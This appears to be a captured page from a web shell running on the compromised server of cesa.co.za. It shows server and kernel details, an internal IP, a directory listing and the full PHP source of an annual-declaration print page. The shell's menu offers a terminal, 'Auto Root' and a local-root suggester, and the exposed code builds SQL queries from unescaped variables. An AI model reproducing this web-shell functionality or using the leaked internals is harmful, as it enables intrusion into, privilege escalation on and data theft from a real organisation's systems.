Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
echasl23 /
annualdec /
print /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-sr-x
2010-05-27 06:28
inc_printheader.php
269
B
-rw-r--r--
2010-05-27 04:41
inc_schedule1.php
15.67
KB
-rw-r--r--
2011-01-18 10:48
inc_schedule1b.php
10.88
KB
-rw-r--r--
2011-01-18 10:48
inc_schedule1p2.php
18.59
KB
-rw-r--r--
2011-03-31 07:59
part1.php
98.26
KB
-rw-r--r--
2025-11-20 13:55
part2.php
2.91
KB
-rw-r--r--
2018-08-01 08:49
Save
Rename
<?php // Configuration and Autentication include( '../inc/auth.inc' ); include( '../inc/func.inc' ); // System Includes //include( '../inc/pref.inc' ); // Variables Unique to page // Start Page Includes include( '../inc/db.inc' ); include( '../inc/conf.inc' ); // include( '../inc/header.inc' ); $title = "Annual Declaration " & $DeclarationYear; $description = "Consulting Engineers of South Africa. Annual Declaration " & $DeclarationYear & "."; $keywords = "online, services, members, consulting, engineers"; ?> <!-- Start Page Content Here --> <head> <script language="JavaScript"> <!-- function MM_openBrWindow(theURL,winName,features) { //v2.0 window.open(theURL,winName,features); } //--> </script> <title>Annual Declaration <?php echo $DeclarationYear; ?></title> <style> body, td, p { font-family: Helvetica, Arial, sans-serif; font-size: 11px; } </style> </head> <body bgcolor="#FFFFFF"> <?php include( '../inc/declaration.inc' ); ?> <table border=0 cellspacing=0 cellpadding=0 align="center" width="100%"> <tr> <td valign=top height="947"> <?php include("inc_printheader.php"); ?> <p align="center"><strong><br> PART 2 – PRINCIPALS AND PROFESSIONAL STAFF</strong></p> <table width="90%" border="0" align="center"> <tr> <td width="24%" height="20"><b>NAME OF FIRM</b></td> <td width="25%" height="20"><?php echo $MemberFirmName ; ?></td> </tr> </table> <?php $FirstOne = true; $AllOfficesquery = "SELECT * FROM ".$sOfficesTable." WHERE (".$sFirmID." = '$MemberFirmID') AND (SaaceBranch <> 'International' OR SaaceBranch IS NULL) ORDER BY OfficeID"; $AllOfficesresult = mysql_query($AllOfficesquery) or die("Select of offices Failed"); while ($AllOfficesrow = mysql_fetch_array($AllOfficesresult)) { if (!$FirstOne) { ?> </div> <div style="page-break-before:always"> <?php include("inc_printheader.php"); ?> <? } $FirstOne = false; $SelectOfficeID = $AllOfficesrow["OfficeID"]; include("inc_schedule1p2.php"); } mysql_free_result($AllOfficesresult); ?> </div> <?php $FirstOne = true; $AllOfficesquery = "SELECT * FROM ".$sOfficesTable." WHERE (".$sFirmID." = '$MemberFirmID') AND (SaaceBranch = 'International') ORDER BY OfficeID"; $AllOfficesresult = mysql_query($AllOfficesquery) or die("Select of offices Failed"); if (mysql_num_rows($AllOfficesresult) > 0) { ?> <div style="page-break-before:always"> <?php include("inc_printheader.php"); ?> <?php while ($AllOfficesrow = mysql_fetch_array($AllOfficesresult)) { if (!$FirstOne) { ?> </div> <div style="page-break-before:always"> <?php include("inc_printheader.php"); ?> <? } $FirstOne = false; $SelectOfficeID = $AllOfficesrow["OfficeID"]; include("inc_schedule1p2.php"); } } mysql_free_result($AllOfficesresult); ?> </div> <!-- End Page Content Here --> <?php // End page Includes include( '../inc/footer2.inc' ); ?>